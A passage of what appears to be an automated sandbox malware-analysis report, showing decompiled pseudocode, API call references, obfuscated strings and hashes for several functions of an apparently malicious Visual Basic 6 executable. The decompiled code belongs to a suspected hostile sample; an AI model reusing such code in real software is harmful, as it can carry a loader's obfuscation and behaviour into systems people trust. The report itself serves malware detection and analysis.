				}
				asm("wait");
				_push(E00409FA1);
				L0040166C();
				L004015E8();
				return _t99;
			}

0x00409c6f
0x00409c7e
0x00409c8a
0x00409c92
0x00409c95
0x00409c9c
0x00409cab
0x00409cb4
0x00409cb9
0x00409cbe
0x00409cc3
0x00409cc4
0x00409cce
0x00409cd3
0x00409cd4
0x00409cd9
0x00409ce0
0x00409ce6
0x00409cf0
0x00409cfe
0x00409d0b
0x00409d28
0x00409d0d
0x00409d0d
0x00409d12
0x00409d17
0x00409d1c
0x00409d1c
0x00409d38
0x00409d3a
0x00409d4a
0x00409d4e
0x00409d53
0x00409d57
0x00409d5d
0x00409d61
0x00409d6d
0x00409d75
0x00409d78
0x00409d7a
0x00409d87
0x00409da9
0x00409d89
0x00409d89
0x00409d8b
0x00409d90
0x00409d96
0x00409d9c
0x00409da1
0x00409da1
0x00409db3
0x00409dbb
0x00409dbb
0x00409dc0
0x00409dc7
0x00409dce
0x00409dd5
0x00409ddc
0x00409ddc
0x00409de0
0x00409de7
0x00409dee
0x00409df8
0x00409dfc
0x00409e00
0x00409e04
0x00409e08
0x00409e09
0x00409e11
0x00409e12
0x00409e15
0x00409e16
0x00409e1b
0x00409e1c
0x00409e21
0x00409e26
0x00409e2c
0x00409e2e
0x00409e2f
0x00409e3d
0x00409e31
0x00409e31
0x00409e31
0x00409e4c
0x00409e53
0x00409e56
0x00409e5e
0x00409e62
0x00409e66
0x00409e6a
0x00409e6e
0x00409e6f
0x00409e71
0x00409e76
0x00409e79
0x00409e82
0x00409e8e
0x00409e8f
0x00409e98
0x00409ea5
0x00409eaf
0x00409eb5
0x00409ebb
0x00409ea7
0x00409ea7
0x00409ea7
0x00409ec0
0x00409ec4
0x0040142c
0x0040142c
0x00409eca
0x00409ed7
0x00409ee1
0x00409eea
0x00409ef7
0x00409f01
0x00409f0b
0x00409f1b
0x00409f21
0x00409f23
0x00409f30
0x00409f52
0x00409f32
0x00409f32
0x00409f37
0x00409f3c
0x00409f3f
0x00409f45
0x00409f4a
0x00409f4a
0x00409f30
0x00409f59
0x00409f5a
0x00409f93
0x00409f9b
0x00409fa0

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 00409C8A
__vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 00409CB4
__vbaI4Str.MSVBVM60(00402A84,?,?,?,?,00401426), ref: 00409CBE
#537.MSVBVM60(00000000,00402A84,?,?,?,?,00401426), ref: 00409CC4
__vbaStrMove.MSVBVM60(00000000,00402A84,?,?,?,?,00401426), ref: 00409CCE
__vbaStrCmp.MSVBVM60(00402A94,00000000,00000000,00402A84,?,?,?,?,00401426), ref: 00409CD9
__vbaFreeStr.MSVBVM60(00402A94,00000000,00000000,00402A84,?,?,?,?,00401426), ref: 00409CF0
__vbaNew2.MSVBVM60(004026C8,0040C33C,00402A94,00000000,00000000,00402A84,?,?,?,?,00401426), ref: 00409D17
__vbaLateMemCallLd.MSVBVM60(?,?,CYtZi0nszoU4nj128,00000000), ref: 00409D4E
__vbaObjVar.MSVBVM60(00000000,?,?,?,00401426), ref: 00409D57
__vbaObjSetAddref.MSVBVM60(00000000,00000000,00000000,?,?,?,00401426), ref: 00409D61
__vbaHresultCheckObj.MSVBVM60(00000000,?,004026B8,0000000C), ref: 00409D9C
__vbaFreeObj.MSVBVM60(00000000,?,004026B8,0000000C), ref: 00409DB3
__vbaFreeVar.MSVBVM60(00000000,?,004026B8,0000000C), ref: 00409DBB
#664.MSVBVM60(?,00000002,00000002,00000002,00000002), ref: 00409E09
__vbaStrVarVal.MSVBVM60(?,?,?,00000002,00000002,00000002,00000002), ref: 00409E16
#581.MSVBVM60(00000000,?,?,?,00000002,00000002,00000002,00000002), ref: 00409E1C
__vbaFpR8.MSVBVM60(00000000,?,?,?,00000002,00000002,00000002,00000002), ref: 00409E21
__vbaFreeStr.MSVBVM60 ref: 00409E56
__vbaFreeVarList.MSVBVM60(00000005,00000002,00000002,00000002,00000002,?), ref: 00409E71
_adj_fdiv_m64.MSVBVM60(?,00402A84,?,?,?,?,00401426), ref: 00409EBB
__vbaFpI4.MSVBVM60(?,?,?,00402A84,?,?,?,?,00401426), ref: 00409EEA
__vbaHresultCheckObj.MSVBVM60(00000000,00401348,0040246C,000002C0), ref: 00409F45
__vbaFreeStr.MSVBVM60(00409FA1,00402A84,?,?,?,?,00401426), ref: 00409F93
__vbaFreeObj.MSVBVM60(00409FA1,00402A84,?,?,?,?,00401426), ref: 00409F9B

Strings

d, xrefs: 00409DE7
CYtZi0nszoU4nj128, xrefs: 00409D42
c, xrefs: 00409DCE

Memory Dump Source

Source File: 00000000.00000002.457742427.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.457737838.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.457750719.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.457755682.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$#537#581#664AddrefCallChkstkCopyLateListMoveNew2_adj_fdiv_m64
String ID: CYtZi0nszoU4nj128$c$d
API String ID: 1323223818-1097554447
Opcode ID: 8d9f82943bc1228b1c64f27fc1fc48155cf77e39c08600e9fdda596280ee48a9
Instruction ID: 7329d74296c660b870e45bb45a971fc132197c69cf7761ff802effb94d858492
Opcode Fuzzy Hash: 8d9f82943bc1228b1c64f27fc1fc48155cf77e39c08600e9fdda596280ee48a9
Instruction Fuzzy Hash: 6A812B71900209EBDB10EF91DD89BEEB7B8BF04704F1085AAF109B61E1DB795A84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00409A2B, Relevance: 47.4, APIs: 24, Strings: 3, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00409A2B(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v44;
				char _v48;
				char _v64;
				intOrPtr _v72;
				intOrPtr _v80;
				void* _v84;
				signed int _v88;
				intOrPtr* _v92;
				signed int _v96;
				intOrPtr* _v108;
				signed int _v112;
				signed int _v116;
				signed int _t66;
				signed int _t71;
				char* _t75;
				signed int _t81;
				void* _t83;
				char* _t84;
				signed int _t87;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t113 = _t112 - 0xc;
				 *[fs:0x0] = _t113;
				L00401420();
				_v16 = _t113;
				_v12 = 0x4012f8;
				_v8 = 0;
				_t66 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x5c,  *[fs:0x0], 0x401426, _t110);
				L0040163C();
				L0040163C();
				_push(2);
				_push(_v32);
				L00401558();
				L00401678();
				_push(_t66);
				_push(0x402938);
				L0040167E();
				asm("sbb eax, eax");
				_v84 =  ~( ~( ~_t66));
				L0040166C();
				if(_v84 != 0) {
					_push(1);
					_push(L"KNLE");
					L00401552();
				}
				_v72 = 0x402a58;
				_v80 = 8;
				L004015BE();
				_t71 =  &_v64;
				_push(_t71);
				L0040154C();
				L00401678();
				_push(_t71);
				_push(0);
				L0040167E();
				asm("sbb eax, eax");
				_v84 =  ~( ~_t71 + 1);
				L0040166C();
				L0040164E();
				_t75 = _v84;
				if(_t75 != 0) {
					if( *0x40c33c != 0) {
						_v108 = 0x40c33c;
					} else {
						_push(0x40c33c);
						_push(0x4026c8);
						L0040165A();
						_v108 = 0x40c33c;
					}
					_v84 =  *_v108;
					_t81 =  *((intOrPtr*)( *_v84 + 0x1c))(_v84,  &_v44);
					asm("fclex");
					_v88 = _t81;
					if(_v88 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x4026b8);
						_push(_v84);
						_push(_v88);
						L00401654();
						_v112 = _t81;
					}
					_v92 = _v44;
					_v72 = 1;
					_v80 = 2;
					_t83 = 0x10;
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401546();
					_t84 =  &_v48;
					L0040159A();
					_t87 =  *((intOrPtr*)( *_v92 + 0x58))(_v92, _t84, _t84, _t83, _v28, 0x402a60);
					asm("fclex");
					_v96 = _t87;
					if(_v96 >= 0) {
						_v116 = _v116 & 0x00000000;
					} else {
						_push(0x58);
						_push(0x402a70);
						_push(_v92);
						_push(_v96);
						L00401654();
						_v116 = _t87;
					}
					_push( &_v44);
					_t75 =  &_v48;
					_push(_t75);
					_push(2);
					L00401594();
				}
				_push(E00409C4D);
				L004015E8();
				L0040166C();
				L0040166C();
				return _t75;
			}

0x00409a2e
0x00409a3d
0x00409a47
0x00409a4f
0x00409a52
0x00409a59
0x00409a68
0x00409a71
0x00409a7e
0x00409a83
0x00409a85
0x00409a88
0x00409a92
0x00409a97
0x00409a98
0x00409a9d
0x00409aa4
0x00409aaa
0x00409ab1
0x00409abc
0x00409abe
0x00409ac0
0x00409ac5
0x00409ac5
0x00409aca
0x00409ad1
0x00409ade
0x00409ae3
0x00409ae6
0x00409ae7
0x00409af1
0x00409af6
0x00409af7
0x00409af9
0x00409b00
0x00409b05
0x00409b0c
0x00409b14
0x00409b19
0x00409b1f
0x00409b2c
0x00409b46
0x00409b2e
0x00409b2e
0x00409b33
0x00409b38
0x00409b3d
0x00409b3d
0x00409b52
0x00409b61
0x00409b64
0x00409b66
0x00409b6d
0x00409b86
0x00409b6f
0x00409b6f
0x00409b71
0x00409b76
0x00409b79
0x00409b7c
0x00409b81
0x00409b81
0x00409b8d
0x00409b90
0x00409b97
0x00409ba0
0x00409ba1
0x00409bab
0x00409bac
0x00409bad
0x00409bae
0x00409bb7
0x00409bbd
0x00409bc1
0x00409bcf
0x00409bd2
0x00409bd4
0x00409bdb
0x00409bf4
0x00409bdd
0x00409bdd
0x00409bdf
0x00409be4
0x00409be7
0x00409bea
0x00409bef
0x00409bef
0x00409bfb
0x00409bfc
0x00409bff
0x00409c00
0x00409c02
0x00409c07
0x00409c0a
0x00409c37
0x00409c3f
0x00409c47
0x00409c4c

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 00409A47
__vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 00409A71
__vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 00409A7E
#514.MSVBVM60(?,00000002,?,?,?,?,00401426), ref: 00409A88
__vbaStrMove.MSVBVM60(?,00000002,?,?,?,?,00401426), ref: 00409A92
__vbaStrCmp.MSVBVM60(00402938,00000000,?,00000002,?,?,?,?,00401426), ref: 00409A9D
__vbaFreeStr.MSVBVM60(00402938,00000000,?,00000002,?,?,?,?,00401426), ref: 00409AB1
#580.MSVBVM60(KNLE,00000001,00402938,00000000,?,00000002,?,?,?,?,00401426), ref: 00409AC5
__vbaVarDup.MSVBVM60 ref: 00409ADE
#667.MSVBVM60(?), ref: 00409AE7
__vbaStrMove.MSVBVM60(?), ref: 00409AF1
__vbaStrCmp.MSVBVM60(00000000,00000000,?), ref: 00409AF9
__vbaFreeStr.MSVBVM60(00000000,00000000,?), ref: 00409B0C
__vbaFreeVar.MSVBVM60(00000000,00000000,?), ref: 00409B14
__vbaNew2.MSVBVM60(004026C8,0040C33C,00000000,00000000,?), ref: 00409B38
__vbaHresultCheckObj.MSVBVM60(00000000,?,004026B8,0000001C,?,?,?,?,00000000,00000000,?), ref: 00409B7C
__vbaChkstk.MSVBVM60(?,?,?,?,00000000,00000000,?), ref: 00409BA1
__vbaCastObj.MSVBVM60(?,00402A60,?,?,?,?,00000000,00000000,?), ref: 00409BB7
__vbaObjSet.MSVBVM60(00000000,00000000,?,00402A60,?,?,?,?,00000000,00000000,?), ref: 00409BC1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402A70,00000058,?,?,?,?,00000000,00000000,?), ref: 00409BEA
__vbaFreeObjList.MSVBVM60(00000002,00000000,?,?,?,?,?,?,?,00000000,00000000,?), ref: 00409C02
__vbaFreeObj.MSVBVM60(00409C4D,00000000,00000000,?), ref: 00409C37

Strings

KNLE, xrefs: 00409AC0
ABC, xrefs: 00409A76
tmp, xrefs: 00409ACA

Memory Dump Source

Source File: 00000000.00000002.457742427.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.457737838.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.457750719.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.457755682.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckChkstkCopyHresultMove$#514#580#667CastListNew2
String ID: ABC$KNLE$tmp
API String ID: 1916041330-2148770640
Opcode ID: cc9825f74e56f401b8443a1deaec81d5c143ff989090cf5bd90650bf4d6f62d5
Instruction ID: 7181acd2d1157b67b7e0a88f77f2e82d975f6c0b7aba94dea4f7c63fa32df982
Opcode Fuzzy Hash: cc9825f74e56f401b8443a1deaec81d5c143ff989090cf5bd90650bf4d6f62d5
Instruction Fuzzy Hash: 2051E571D40208ABCB10EFE5DC46BEEBBB4AF14704F10852AF406BB1E1DBB99945CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00408B48, Relevance: 45.7, APIs: 22, Strings: 4, Instructions: 196
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00408B48(void* __ebx, void* __ecx, void* __edi, void* __esi, long long __fp0) {
				intOrPtr _v8;
				long long* _v12;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				char _v44;
				char _v60;
				char _v76;
				char _v92;
				char _v112;
				char* _v120;
				char _v128;
				char* _v136;
				intOrPtr _v144;
				intOrPtr _v152;
				intOrPtr _v160;
				void* _v180;
				signed int _v184;
				signed int _v192;
				intOrPtr* _v196;
				signed int _v200;
				short _t73;
				char* _t83;
				signed int _t91;
				void* _t99;
				long long* _t115;
				long long* _t116;
				short _t117;
				long long _t121;

				_t121 = __fp0;
				_t99 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t115;
				L00401420();
				_v12 = _t115;
				_v8 = 0x401238;
				_push( &_v44);
				L00401606();
				_push( &_v44);
				asm("fld1");
				_push(__ecx);
				_push(__ecx);
				 *_t115 = __fp0;
				_push(0x4028ac);
				_push( &_v60);
				L0040160C();
				_push( &_v76);
				L00401606();
				_v120 = 1;
				_v128 = 2;
				_push( &_v60);
				_push( &_v76);
				_push( &_v128);
				_t73 =  &_v92;
				_push(_t73);
				L0040162A();
				_push(_t73);
				L00401612();
				_v180 = _t73;
				_push( &_v92);
				_push( &_v60);
				_push( &_v76);
				_push( &_v44);
				_push(4);
				L00401600();
				_t116 = _t115 + 0x14;
				_t117 = _v180;
				if(_t117 != 0) {
					_v120 = L"Rumorer8";
					_v128 = 8;
					_v152 = 0x35b2bc;
					_v160 = 3;
					_push(0x10);
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(2);
					_push(L"iWttTKulK1qrU139");
					_push(_v28);
					L004015FA();
					_t116 = _t116 + 0x2c;
				}
				_v36 = 1;
				_v44 = 2;
				_push( &_v44);
				asm("fld1");
				_push(_t99);
				_push(_t99);
				_v92 = _t121;
				asm("fld1");
				_push(_t99);
				_push(_t99);
				 *_t116 = _t121;
				asm("fld1");
				_push(_t99);
				_push(_t99);
				 *_t116 = _t121;
				_push(_t99);
				_push(_t99);
				 *_t116 =  *0x401230;
				L004015EE();
				L004015F4();
				asm("fcomp qword [0x401228]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t117 == 0) {
					_v192 = _v192 & 0x00000000;
				} else {
					_v192 = 1;
				}
				_v180 =  ~_v192;
				L0040164E();
				if(_v180 != 0) {
					if( *0x40c33c != 0) {
						_v196 = 0x40c33c;
					} else {
						_push(0x40c33c);
						_push(0x4026c8);
						L0040165A();
						_v196 = 0x40c33c;
					}
					_v180 =  *_v196;
					_v136 = L"REINHOLTS";
					_v144 = 8;
					_v120 = 0x20;
					_v128 = 2;
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t91 =  *((intOrPtr*)( *_v180 + 0x38))(_v180, 0x10, 0x10,  &_v44);
					asm("fclex");
					_v184 = _t91;
					if(_v184 >= 0) {
						_v200 = _v200 & 0x00000000;
					} else {
						_push(0x38);
						_push(0x4026b8);
						_push(_v180);
						_push(_v184);
						L00401654();
						_v200 = _t91;
					}
					_push( &_v44);
					_push( &_v112);
					L00401660();
					_push( &_v112);
					_push( &_v24);
					L00401666();
					L0040164E();
				}
				asm("wait");
				_push(E00408E08);
				_t83 =  &_v24;
				_push(_t83);
				_push(0);
				L00401618();
				L004015E8();
				return _t83;
			}

0x00408b48
0x00408b48
0x00408b4b
0x00408b4c
0x00408b4d
0x00408b58
0x00408b59
0x00408b65
0x00408b6d
0x00408b70
0x00408b7a
0x00408b7b
0x00408b83
0x00408b84
0x00408b86
0x00408b87
0x00408b88
0x00408b8b
0x00408b93
0x00408b94
0x00408b9c
0x00408b9d
0x00408ba2
0x00408ba9
0x00408bb3
0x00408bb7
0x00408bbb
0x00408bbc
0x00408bbf
0x00408bc0
0x00408bc5
0x00408bc6
0x00408bcb
0x00408bd5
0x00408bd9
0x00408bdd
0x00408be1
0x00408be2
0x00408be4
0x00408be9
0x00408bf3
0x00408bf5
0x00408bf7
0x00408bfe
0x00408c05
0x00408c0f
0x00408c19
0x00408c1c
0x00408c26
0x00408c27
0x00408c28
0x00408c29
0x00408c2a
0x00408c2d
0x00408c3a
0x00408c3b
0x00408c3c
0x00408c3d
0x00408c3e
0x00408c40
0x00408c45
0x00408c48
0x00408c4d
0x00408c4d
0x00408c50
0x00408c57
0x00408c61
0x00408c62
0x00408c64
0x00408c65
0x00408c66
0x00408c69
0x00408c6b
0x00408c6c
0x00408c6d
0x00408c70
0x00408c72
0x00408c73
0x00408c74
0x00408c7d
0x00408c7e
0x00408c7f
0x00408c82
0x00408c87
0x00408c8c
0x00408c92
0x00408c94
0x00408c95
0x00408ca3
0x00408c97
0x00408c97
0x00408c97
0x00408cb2
0x00408cbc
0x00408cca
0x00408cd7
0x00408cf4
0x00408cd9
0x00408cd9
0x00408cde
0x00408ce3
0x00408ce8
0x00408ce8
0x00408d06
0x00408d0c
0x00408d16
0x00408d20
0x00408d27
0x00408d35
0x00408d42
0x00408d43
0x00408d44
0x00408d45
0x00408d49
0x00408d53
0x00408d54
0x00408d55
0x00408d56
0x00408d65
0x00408d68
0x00408d6a
0x00408d77
0x00408d99
0x00408d79
0x00408d79
0x00408d7b
0x00408d80
0x00408d86
0x00408d8c
0x00408d91
0x00408d91
0x00408da3
0x00408da7
0x00408da8
0x00408db0
0x00408db4
0x00408db5
0x00408dbd
0x00408dbd
0x00408dc2
0x00408dc3
0x00408df4
0x00408df7
0x00408df8
0x00408dfa
0x00408e02
0x00408e07

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 00408B65
#610.MSVBVM60(?,?,?,?,?,00401426), ref: 00408B7B
#661.MSVBVM60(?,004028AC,?,?,?,?,?,?,?,?,00401426), ref: 00408B94
#610.MSVBVM60(?,?,004028AC,?,?,?,?,?,?,?,?,00401426), ref: 00408B9D
__vbaVarAdd.MSVBVM60(?,00000002,?,?), ref: 00408BC0
__vbaVarTstNe.MSVBVM60(00000000,?,00000002,?,?), ref: 00408BC6
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?,00000000,?,00000002,?,?), ref: 00408BE4
__vbaChkstk.MSVBVM60 ref: 00408C1C
__vbaChkstk.MSVBVM60 ref: 00408C2D
__vbaLateMemCall.MSVBVM60(?,iWttTKulK1qrU139,00000002), ref: 00408C48
#673.MSVBVM60(?,?,?,?,?,?,?,?,00000002), ref: 00408C82
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,00000002), ref: 00408C87
__vbaFreeVar.MSVBVM60 ref: 00408CBC
__vbaNew2.MSVBVM60(004026C8,0040C33C), ref: 00408CE3
__vbaChkstk.MSVBVM60(00000002), ref: 00408D35
__vbaChkstk.MSVBVM60(00000002), ref: 00408D49
__vbaHresultCheckObj.MSVBVM60(00000000,?,004026B8,00000038), ref: 00408D8C
__vbaVar2Vec.MSVBVM60(?,00000002), ref: 00408DA8
__vbaAryMove.MSVBVM60(?,?,?,00000002), ref: 00408DB5
__vbaFreeVar.MSVBVM60(?,?,?,00000002), ref: 00408DBD

Strings

iWttTKulK1qrU139, xrefs: 00408C40
Rumorer8, xrefs: 00408BF7
, xrefs: 00408D20
REINHOLTS, xrefs: 00408D0C

Memory Dump Source

Source File: 00000000.00000002.457742427.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.457737838.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.457750719.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.457755682.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$Free$#610$#661#673CallCheckHresultLateListMoveNew2Var2
String ID: $REINHOLTS$Rumorer8$iWttTKulK1qrU139
API String ID: 718425485-844045677
Opcode ID: 94e8afeef7df2100d0b770c90c4fbfbc770fe91228332f117477b5aa98014f9c
Instruction ID: 646310d1449410ce75c166debde83a2c0c81446029c0f3b396b6b7d3aec714db
Opcode Fuzzy Hash: 94e8afeef7df2100d0b770c90c4fbfbc770fe91228332f117477b5aa98014f9c
Instruction Fuzzy Hash: 6E717DB1810608ABDB11EF91CD46BDEB7B9BF08704F0046AEF504B71D1DBB95A848F69

Uniqueness

Uniqueness Score: -1.00%

Function 004095F5, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 189
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E004095F5(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				signed int _v28;
				char _v32;
				char _v48;
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				short _v72;
				signed int _v80;
				intOrPtr* _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr* _v100;
				signed int _v104;
				intOrPtr* _v108;
				signed int _v112;
				signed int _t102;
				signed int _t107;
				char* _t112;
				signed int _t113;
				signed int* _t116;
				signed int _t122;
				char* _t126;
				signed int _t129;
				intOrPtr _t146;

				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t146;
				_push(0x5c);
				L00401420();
				_v12 = _t146;
				_v8 = 0x4012c8;
				L0040163C();
				if( *0x40c33c != 0) {
					_v84 = 0x40c33c;
				} else {
					_push(0x40c33c);
					_push(0x4026c8);
					L0040165A();
					_v84 = 0x40c33c;
				}
				_v56 =  *_v84;
				_t102 =  *((intOrPtr*)( *_v56 + 0x4c))(_v56,  &_v28);
				asm("fclex");
				_v60 = _t102;
				if(_v60 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x4c);
					_push(0x4026b8);
					_push(_v56);
					_push(_v60);
					L00401654();
					_v88 = _t102;
				}
				_v64 = _v28;
				_t107 =  *((intOrPtr*)( *_v64 + 0x20))(_v64,  &_v52);
				asm("fclex");
				_v68 = _t107;
				if(_v68 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0x20);
					_push(0x4029d4);
					_push(_v64);
					_push(_v68);
					L00401654();
					_v92 = _t107;
				}
				_v72 =  ~(0 | _v52 != 0x00000000);
				L004015E8();
				if(_v72 != 0) {
					_t122 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v28);
					asm("fclex");
					_v56 = _t122;
					if(_v56 >= 0) {
						_v96 = _v96 & 0x00000000;
					} else {
						_push(0x160);
						_push(0x40246c);
						_push(_a4);
						_push(_v56);
						L00401654();
						_v96 = _t122;
					}
					if( *0x40c33c != 0) {
						_v100 = 0x40c33c;
					} else {
						_push(0x40c33c);
						_push(0x4026c8);
						L0040165A();
						_v100 = 0x40c33c;
					}
					_v60 =  *_v100;
					_v80 = _v28;
					_v28 = _v28 & 0x00000000;
					_t126 =  &_v32;
					L0040159A();
					_t129 =  *((intOrPtr*)( *_v60 + 0x40))(_v60, _t126, _t126, _v80, L"Costards1");
					asm("fclex");
					_v64 = _t129;
					if(_v64 >= 0) {
						_v104 = _v104 & 0x00000000;
					} else {
						_push(0x40);
						_push(0x4026b8);
						_push(_v60);
						_push(_v64);
						L00401654();
						_v104 = _t129;
					}
					L004015E8();
				}
				_push(0x889);
				_t112 =  &_v48;
				_push(_t112);
				L00401588();
				_push(_t112);
				L0040158E();
				_v56 =  ~(0 | _t112 != 0x0000ffff);
				L0040164E();
				_t113 = _v56;
				if(_t113 != 0) {
					if( *0x40c33c != 0) {
						_v108 = 0x40c33c;
					} else {
						_push(0x40c33c);
						_push(0x4026c8);
						L0040165A();
						_v108 = 0x40c33c;
					}
					_v56 =  *_v108;
					_t116 =  &_v28;
					L00401582();
					_t113 =  *((intOrPtr*)( *_v56 + 0x10))(_v56, _t116, _t116, _a4);
					asm("fclex");
					_v60 = _t113;
					if(_v60 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x10);
						_push(0x4026b8);
						_push(_v56);
						_push(_v60);
						L00401654();
						_v112 = _t113;
					}
					L004015E8();
				}
				_push(E0040987C);
				L0040166C();
				return _t113;
			}

0x004095fa
0x00409605
0x00409606
0x0040960d
0x00409610
0x00409618
0x0040961b
0x00409628
0x00409634
0x0040964e
0x00409636
0x00409636
0x0040963b
0x00409640
0x00409645
0x00409645
0x0040965a
0x00409669
0x0040966c
0x0040966e
0x00409675
0x0040968e
0x00409677
0x00409677
0x00409679
0x0040967e
0x00409681
0x00409684
0x00409689
0x00409689
0x00409695
0x004096a4
0x004096a7
0x004096a9
0x004096b0
0x004096c9
0x004096b2
0x004096b2
0x004096b4
0x004096b9
0x004096bc
0x004096bf
0x004096c4
0x004096c4
0x004096d8
0x004096df
0x004096ea
0x004096fc
0x00409702
0x00409704
0x0040970b
0x00409727
0x0040970d
0x0040970d
0x00409712
0x00409717
0x0040971a
0x0040971d
0x00409722
0x00409722
0x00409732
0x0040974c
0x00409734
0x00409734
0x00409739
0x0040973e
0x00409743
0x00409743
0x00409758
0x0040975e
0x00409761
0x0040976d
0x00409771
0x0040977f
0x00409782
0x00409784
0x0040978b
0x004097a4
0x0040978d
0x0040978d
0x0040978f
0x00409794
0x00409797
0x0040979a
0x0040979f
0x0040979f
0x004097ab
0x004097ab
0x004097b0
0x004097b5
0x004097b8
0x004097b9
0x004097be
0x004097bf
0x004097cf
0x004097d6
0x004097db
0x004097e1
0x004097ea
0x00409804
0x004097ec
0x004097ec
0x004097f1
0x004097f6
0x004097fb
0x004097fb
0x00409810
0x00409816
0x0040981a
0x00409828
0x0040982b
0x0040982d
0x00409834
0x0040984d
0x00409836
0x00409836
0x00409838
0x0040983d
0x00409840
0x00409843
0x00409848
0x00409848
0x00409854
0x00409854
0x00409859
0x00409876
0x0040987b

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 00409610
__vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 00409628
__vbaNew2.MSVBVM60(004026C8,0040C33C,?,?,?,?,00401426), ref: 00409640
__vbaHresultCheckObj.MSVBVM60(00000000,?,004026B8,0000004C), ref: 00409684
__vbaHresultCheckObj.MSVBVM60(00000000,?,004029D4,00000020), ref: 004096BF
__vbaFreeObj.MSVBVM60(00000000,?,004029D4,00000020), ref: 004096DF
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040246C,00000160), ref: 0040971D
__vbaNew2.MSVBVM60(004026C8,0040C33C), ref: 0040973E
__vbaObjSet.MSVBVM60(?,?,Costards1), ref: 00409771
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004026B8,00000040), ref: 0040979A
__vbaFreeObj.MSVBVM60(00000000,00000000,004026B8,00000040), ref: 004097AB
__vbaVarErrI4.MSVBVM60(?,00000889), ref: 004097B9
#559.MSVBVM60(00000000,?,00000889), ref: 004097BF
__vbaFreeVar.MSVBVM60(00000000,?,00000889), ref: 004097D6
__vbaNew2.MSVBVM60(004026C8,0040C33C,00000000,?,00000889), ref: 004097F6
__vbaObjSetAddref.MSVBVM60(?,?,00000000,?,00000889), ref: 0040981A
__vbaHresultCheckObj.MSVBVM60(00000000,?,004026B8,00000010), ref: 00409843
__vbaFreeObj.MSVBVM60(00000000,?,004026B8,00000010), ref: 00409854
__vbaFreeStr.MSVBVM60(0040987C,00000000,?,00000889), ref: 00409876

Strings

Costards1, xrefs: 00409765

Memory Dump Source

Source File: 00000000.00000002.457742427.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.457737838.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.457750719.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.457755682.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$New2$#559AddrefChkstkCopy
String ID: Costards1
API String ID: 2062356824-983065347
Opcode ID: e06777ddf9bce3ea6efac95e98a9b15bdb00e788097d2456f376ddf0b6f23e06
Instruction ID: 77ed4246b64722fa5d07afe45a818e3a7e38717746df2642f5dd7c3d63b1b6ba
Opcode Fuzzy Hash: e06777ddf9bce3ea6efac95e98a9b15bdb00e788097d2456f376ddf0b6f23e06
Instruction Fuzzy Hash: 83810270910208EFCF00EF95D989BADBBB4AF18305F20853AF406BB2E1D7795945CB58

Uniqueness

Uniqueness Score: -1.00%

